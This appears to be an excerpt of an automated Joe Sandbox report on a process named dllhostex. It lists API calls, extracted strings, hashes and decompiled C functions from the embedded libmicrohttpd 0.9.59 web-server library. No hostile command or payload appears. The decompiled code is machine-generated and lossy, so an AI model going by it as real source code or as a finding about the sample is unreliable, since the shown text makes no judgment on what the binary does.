                                                • WSAGetLastError.WS2_32 ref: 0134AB26
                                                Strings
                                                • Failed to signal resume of connection via inter-thread communication channel., xrefs: 0134AB33
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AB8C
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABF5
                                                • (NULL != prev) || (daemon->shutdown), xrefs: 0134A900
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB9D
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABE4
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB55
                                                • NULL == (pos)->prevX, xrefs: 0134AB7D
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AB73
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABB8
                                                • pos->suspended, xrefs: 0134ABD5
                                                • NULL == (pos)->prevX, xrefs: 0134ABA9
                                                • NULL == (pos)->nextX, xrefs: 0134ABBF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABC9
                                                • (NULL != (pos)->next) || ((pos) == (daemon->suspended_connections_tail)), xrefs: 0134AB4B
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB6E
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABFA
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A90F
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A90A
                                                • (NULL != (pos)->prev) || ((pos) == (daemon->suspended_connections_head)), xrefs: 0134AB64
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB87
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABCE
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABDF
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AB5A
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABB3
                                                • NULL == daemon->worker_pool, xrefs: 0134ABEB
                                                • NULL == (pos)->nextX, xrefs: 0134AB93
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABA2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Count64EnterErrorLastLeaveTick__aulldivsend
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (pos)->next) || ((pos) == (daemon->suspended_connections_tail))$(NULL != (pos)->prev) || ((pos) == (daemon->suspended_connections_head))$(NULL != prev) || (daemon->shutdown)$Failed to signal resume of connection via inter-thread communication channel.$NULL == (pos)->nextX$NULL == (pos)->nextX$NULL == (pos)->prevX$NULL == (pos)->prevX$NULL == daemon->worker_pool$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$pos->suspended
                                                • API String ID: 2435418420-3733651401
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnterCriticalSection.KERNEL32(0000009C,?,00000000,00000000,0134D9C2), ref: 0134A60F
                                                • LeaveCriticalSection.KERNEL32(0000009C), ref: 0134A626
                                                • EnterCriticalSection.KERNEL32(0000009C,?), ref: 0134A849
                                                • LeaveCriticalSection.KERNEL32(0000009C), ref: 0134A85E
                                                • send.WS2_32(?,013CF22C,00000001,00000000), ref: 0134A87D
                                                • WSAGetLastError.WS2_32 ref: 0134A887
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A798
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A82D
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A6C0
                                                • (NULL != (connection)->prev) || ((connection) == (daemon->connections_head)), xrefs: 0134A747
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A687
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A6E0
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A79D
                                                • ! connection->suspended, xrefs: 0134A78E
                                                • (NULL != (connection)->nextX) || ((connection) == (daemon->manual_timeout_tail)), xrefs: 0134A6B1
                                                • (NULL != (connection)->prevX) || ((connection) == (daemon->manual_timeout_head)), xrefs: 0134A6D6
                                                • (NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head)), xrefs: 0134A678
                                                • Failed to signal resume via inter-thread communication channel., xrefs: 0134A894
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A731
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A6E5
                                                • Cannot resume connections without enabling MHD_ALLOW_SUSPEND_RESUME!, xrefs: 0134A823
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A756
                                                • (NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail)), xrefs: 0134A7CF
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A7DE
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A6BB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A751
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A682
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A72C
                                                • (NULL != (connection)->next) || ((connection) == (daemon->connections_tail)), xrefs: 0134A722
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A7D9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ErrorLastsend
                                                • String ID: ! connection->suspended$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (connection)->next) || ((connection) == (daemon->connections_tail))$(NULL != (connection)->nextX) || ((connection) == (daemon->manual_timeout_tail))$(NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail))$(NULL != (connection)->prev) || ((connection) == (daemon->connections_head))$(NULL != (connection)->prevX) || ((connection) == (daemon->manual_timeout_head))$(NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head))$Cannot resume connections without enabling MHD_ALLOW_SUSPEND_RESUME!$Failed to signal resume via inter-thread communication channel.$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 3480985631-1784498497
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 42%
                                                			E0134BE20(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                				intOrPtr _v8;
                                                				void* __esi;
                                                				void* __ebp;
                                                				long _t68;
                                                				intOrPtr _t75;
                                                				intOrPtr _t76;
                                                				intOrPtr _t77;
                                                				intOrPtr _t78;
                                                				intOrPtr _t79;
                                                				intOrPtr _t81;
                                                				struct _CRITICAL_SECTION* _t83;
                                                				intOrPtr* _t87;
                                                				intOrPtr _t89;
                                                				intOrPtr _t91;
                                                				intOrPtr _t94;
                                                				intOrPtr* _t99;
                                                				intOrPtr _t100;
                                                
                                                				_t87 = __ecx;
                                                				_t61 = __eax;
                                                				_t99 = __ecx;
                                                				_t94 =  *((intOrPtr*)(__ecx + 0x10));
                                                				if(( *(_t94 + 0xe4) & 0x00000004) == 0) {
                                                					_t92 = 3;
                                                					E0134DD20(__ecx, 3);
                                                					_t11 = _t94 + 0x9c; // 0x9c
                                                					_t83 = _t11;
                                                					EnterCriticalSection(_t83);
                                                					if( *((char*)(_t99 + 0xdc)) != 0) {
                                                						_push("! pos->suspended");
                                                						_push(0x1123);
                                                						_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                						_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                						goto L45;
                                                					} else {
                                                						if( *((char*)(_t99 + 0xe4)) == 0) {
                                                							_t92 =  *((intOrPtr*)(_t99 + 0x10));
                                                							_t87 =  *((intOrPtr*)(_t99 + 8));
                                                							if( *((intOrPtr*)(_t99 + 0x90)) !=  *((intOrPtr*)(_t92 + 0xd8)) ||  *((intOrPtr*)(_t99 + 0x94)) !=  *((intOrPtr*)(_t92 + 0xdc))) {
                                                								if(_t87 != 0 || _t99 ==  *((intOrPtr*)(_t94 + 0x2c))) {
                                                									_t75 =  *((intOrPtr*)(_t99 + 0xc));
                                                									if(_t75 != 0) {
                                                										 *((intOrPtr*)(_t75 + 8)) = _t87;
                                                										goto L26;
                                                									} else {
                                                										if(_t99 ==  *((intOrPtr*)(_t94 + 0x28))) {
                                                											 *((intOrPtr*)(_t94 + 0x28)) = _t87;
                                                											L26:
                                                											_t87 =  *((intOrPtr*)(_t99 + 8));
                                                											_t76 =  *((intOrPtr*)(_t99 + 0xc));
                                                											if(_t87 != 0) {
                                                												goto L28;
                                                											} else {
                                                												 *((intOrPtr*)(_t94 + 0x2c)) = _t76;
                                                											}
                                                											goto L29;
                                                										} else {
                                                											_push("(NULL != (pos)->prevX) || ((pos) == (daemon->manual_timeout_head))");
                                                											_push(0x112c);
                                                											_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                											_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                											goto L45;
                                                										}
                                                									}
                                                								} else {
                                                									_push("(NULL != (pos)->nextX) || ((pos) == (daemon->manual_timeout_tail))");
                                                									_push(0x112c);
                                                									_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                									_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                									goto L45;
                                                								}
                                                							} else {
                                                								if(_t87 != 0 || _t99 ==  *((intOrPtr*)(_t94 + 0x24))) {
                                                									_t81 =  *((intOrPtr*)(_t99 + 0xc));
                                                									if(_t81 != 0) {
                                                										 *((intOrPtr*)(_t81 + 8)) = _t87;
                                                										goto L16;
                                                									} else {
                                                										if(_t99 ==  *((intOrPtr*)(_t94 + 0x20))) {
                                                											 *((intOrPtr*)(_t94 + 0x20)) = _t87;
                                                											L16:
                                                											_t87 =  *((intOrPtr*)(_t99 + 8));
                                                											_t76 =  *((intOrPtr*)(_t99 + 0xc));
                                                											if(_t87 != 0) {
                                                												L28:
                                                												 *((intOrPtr*)(_t87 + 0xc)) = _t76;
                                                											} else {
                                                												 *((intOrPtr*)(_t94 + 0x24)) = _t76;
                                                											}
                                                											L29:
                                                											 *((intOrPtr*)(_t99 + 8)) = 0;
                                                											 *((intOrPtr*)(_t99 + 0xc)) = 0;
                                                											_t77 =  *_t99;
                                                											if(_t77 != 0 || _t99 ==  *((intOrPtr*)(_t94 + 0xc))) {
                                                												_t87 =  *((intOrPtr*)(_t99 + 4));
                                                												if(_t87 != 0) {
                                                													 *_t87 = _t77;
                                                													goto L37;
                                                												} else {
                                                													if(_t99 ==  *((intOrPtr*)(_t94 + 8))) {
                                                														 *((intOrPtr*)(_t94 + 8)) = _t77;
                                                														L37:
                                                														_t91 =  *_t99;
                                                														_t78 =  *((intOrPtr*)(_t99 + 4));
                                                														if(_t91 != 0) {
                                                															 *((intOrPtr*)(_t91 + 4)) = _t78;
                                                														} else {
                                                															 *((intOrPtr*)(_t94 + 0xc)) = _t78;
                                                														}
                                                														 *_t99 = 0;
                                                														 *((intOrPtr*)(_t99 + 4)) = 0;
                                                														_t79 =  *((intOrPtr*)(_t94 + 0x18));
                                                														 *_t99 = _t79;
                                                														if( *((intOrPtr*)(_t94 + 0x1c)) != 0) {
                                                															_t61 =  *((intOrPtr*)(_t94 + 0x18));
                                                															 *((intOrPtr*)(_t61 + 4)) = _t99;
                                                															 *((intOrPtr*)(_t94 + 0x18)) = _t99;
                                                															LeaveCriticalSection(_t83);
                                                															goto L43;
                                                														} else {
                                                															 *((intOrPtr*)(_t94 + 0x1c)) = _t99;
                                                															 *((intOrPtr*)(_t94 + 0x18)) = _t99;
                                                															LeaveCriticalSection(_t83);
                                                															return _t79;
                                                														}
                                                													} else {
                                                														_push("(NULL != (pos)->prev) || ((pos) == (daemon->connections_head))");
                                                														_push(0x112f);
                                                														_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                														_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                														goto L45;
                                                													}
                                                												}
                                                											} else {
                                                												_push("(NULL != (pos)->next) || ((pos) == (daemon->connections_tail))");
                                                												_push(0x112f);
                                                												_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                												_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                												goto L45;
                                                											}
                                                										} else {
                                                											_push("(NULL != (pos)->prevX) || ((pos) == (daemon->normal_timeout_head))");
                                                											_push(0x1128);
                                                											_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                											_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                											goto L45;
                                                										}
                                                									}
                                                								} else {
                                                									_push("(NULL != (pos)->nextX) || ((pos) == (daemon->normal_timeout_tail))");
                                                									_push(0x1128);
                                                									_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                									_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                									goto L45;
                                                								}
                                                							}
                                                						} else {
                                                							_push("! pos->resuming");
                                                							_push(0x1124);
                                                							_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                							_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                							L45:
                                                							_push(E0135B8FA(2));
                                                							E012938B0(_t87);
                                                							E0135D32E(_t87, E0135B8FA(2));
                                                							E0135EBB9(_t83, _t87, _t92, _t94, _t99);
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							_push(_t87);
                                                							_push(_t99);
                                                							_t68 = GetCurrentThreadId();
                                                							_t100 = _v8;
                                                							 *(_t100 + 0x80) = _t68;
                                                							while( *((char*)(_t100 + 0xc4)) == 0) {
                                                								_t92 = 1;
                                                								_t89 = _t100;
                                                								if(( *(_t100 + 0xe4) & 0x00000040) == 0) {
                                                									E0134B300(_t83, _t89, 1, _t94);
                                                								} else {
                                                									E0134BCD0(_t89, 1);
                                                								}
                                                								E0134AE20(_t100);
                                                							}
                                                							E0134D150(_t83, _t100, _t92, _t94);
                                                							return 0;
                                                						}
                                                					}
                                                				} else {
                                                					 *((intOrPtr*)(__ecx + 0xac)) = 0x13;
                                                					 *((intOrPtr*)(__ecx + 0xb0)) = 3;
                                                					if(( *(_t94 + 0xe4) & 0x00001000) != 0) {
                                                						L43:
                                                						return _t61;
                                                					} else {
                                                						__imp__#22( *((intOrPtr*)(__ecx + 0xa0)), 1);
                                                						return __eax;
                                                					}
                                                				}
                                                			}





















                                                APIs
                                                • shutdown.WS2_32(?,00000001), ref: 0134BE60
                                                • EnterCriticalSection.KERNEL32(0000009C,?,?,770EEB70,0134D37C), ref: 0134BE7B
                                                • GetCurrentThreadId.KERNEL32 ref: 0134C088
                                                Strings
                                                • (NULL != (pos)->nextX) || ((pos) == (daemon->normal_timeout_tail)), xrefs: 0134BEDB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134C044
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BF48
                                                • (NULL != (pos)->next) || ((pos) == (daemon->connections_tail)), xrefs: 0134BFAA
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BFB4
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BEE5
                                                • (NULL != (pos)->nextX) || ((pos) == (daemon->manual_timeout_tail)), xrefs: 0134BF39
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BF0F
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BEA6
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BF43
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BF0A
                                                • ! pos->suspended, xrefs: 0134C03A
                                                • (NULL != (pos)->prev) || ((pos) == (daemon->connections_head)), xrefs: 0134BFCF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BFD9
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BEA1
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BEEA
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BFDE
                                                • (NULL != (pos)->prevX) || ((pos) == (daemon->manual_timeout_head)), xrefs: 0134BF5E
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BF6D
                                                • ! pos->resuming, xrefs: 0134BE97
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BFB9
                                                • (NULL != (pos)->prevX) || ((pos) == (daemon->normal_timeout_head)), xrefs: 0134BF00
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BF68
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134C049
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalCurrentEnterSectionThreadshutdown
                                                • String ID: ! pos->resuming$! pos->suspended$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (pos)->next) || ((pos) == (daemon->connections_tail))$(NULL != (pos)->nextX) || ((pos) == (daemon->manual_timeout_tail))$(NULL != (pos)->nextX) || ((pos) == (daemon->normal_timeout_tail))$(NULL != (pos)->prev) || ((pos) == (daemon->connections_head))$(NULL != (pos)->prevX) || ((pos) == (daemon->manual_timeout_head))$(NULL != (pos)->prevX) || ((pos) == (daemon->normal_timeout_head))$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 1809109673-1951102780
                                                • Opcode ID: 91e109422980460ac001a53395e9b696c7a06cb3c1bd8db215a8aa32c06562d5
                                                • Instruction ID: 5aaf7cd8b6d6ce34db3eaf9a92c14c6463417c73711596864dd71b4d17ed12f1
                                                • Opcode Fuzzy Hash: 91e109422980460ac001a53395e9b696c7a06cb3c1bd8db215a8aa32c06562d5
                                                • Instruction Fuzzy Hash: 2F71BF70641702AFE724DF2AC841BA6FBE4BB04B0CF00852EE55EA7A45D3B5F8548F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Failed to join a thread, xrefs: 0134D5E1
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D5B3
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D43D
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D609
                                                • false, xrefs: 0134D5FF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D438
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D60E
                                                • 0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD), xrefs: 0134D42E
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D65A
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D696
                                                • Close socket failed., xrefs: 0134D68C
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D54F
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D5EB
                                                • Failed to destroy ITC., xrefs: 0134D650
                                                • Failed to signal shutdown via inter-thread communication channel, xrefs: 0134D5A9
                                                • 0 == daemon->worker_pool_size, xrefs: 0134D545
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D554
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD)$0 == daemon->worker_pool_size$Close socket failed.$Failed to destroy ITC.$Failed to join a thread$Failed to signal shutdown via inter-thread communication channel$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$false
                                                • API String ID: 0-260249329
                                                • Opcode ID: 99758fb0ffd0a86cbb37e826aaf6a65169621966eb6badca3743e1e7664158cc
                                                • Instruction ID: 88eb2ffb2b8164f972e2dda72716038581d4a38bd36fd867426fb8e8b5f127ff
                                                • Opcode Fuzzy Hash: 99758fb0ffd0a86cbb37e826aaf6a65169621966eb6badca3743e1e7664158cc
                                                • Instruction Fuzzy Hash: 085126316407009BF7306BBCEC46FA67BE9AB20B2CF44053DF56AA22D5DB75B9008791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 31%
                                                			E0134AE20(void* __ecx) {
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				long _v48;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				long* _t70;
                                                				long _t71;
                                                				long _t72;
                                                				void* _t75;
                                                				long _t76;
                                                				signed int _t84;
                                                				signed int _t88;
                                                				signed int _t91;
                                                				signed int _t92;
                                                				void* _t102;
                                                				void** _t110;
                                                				signed int _t115;
                                                				signed int _t116;
                                                				long _t119;
                                                				long _t120;
                                                				intOrPtr* _t121;
                                                				signed int _t123;
                                                				signed int _t125;
                                                				signed int _t127;
                                                				signed int _t128;
                                                				signed int* _t132;
                                                				void* _t134;
                                                				signed int _t136;
                                                				long* _t141;
                                                				signed int _t143;
                                                				signed int _t145;
                                                				struct _CRITICAL_SECTION* _t152;
                                                				void* _t158;
                                                				void* _t160;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				void* _t165;
                                                				void* _t169;
                                                				void* _t170;
                                                
                                                				_t163 = _t162 & 0xfffffff8;
                                                				_push(_t110);
                                                				_push(_t162);
                                                				_t134 = __ecx;
                                                				_t152 = __ecx + 0x9c;
                                                				EnterCriticalSection(_t152);
                                                				_t141 =  *(_t134 + 0x1c);
                                                				_t128 = LeaveCriticalSection;
                                                				if(_t141 == 0) {
                                                					L33:
                                                					return  *_t128(_t152);
                                                				} else {
                                                					_t70 = _t141;
                                                					while(1) {
                                                						_t119 =  *_t141;
                                                						if(_t119 == 0 && _t141 != _t70) {
                                                							break;
                                                						}
                                                						_t71 = _t141[1];
                                                						if(_t71 != 0) {
                                                							L8:
                                                							 *_t71 = _t119;
                                                							goto L9;
                                                						} else {
                                                							if(_t141 !=  *(_t134 + 0x18)) {
                                                								_push("(NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head))");
                                                								_push(0xbd9);
                                                								_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
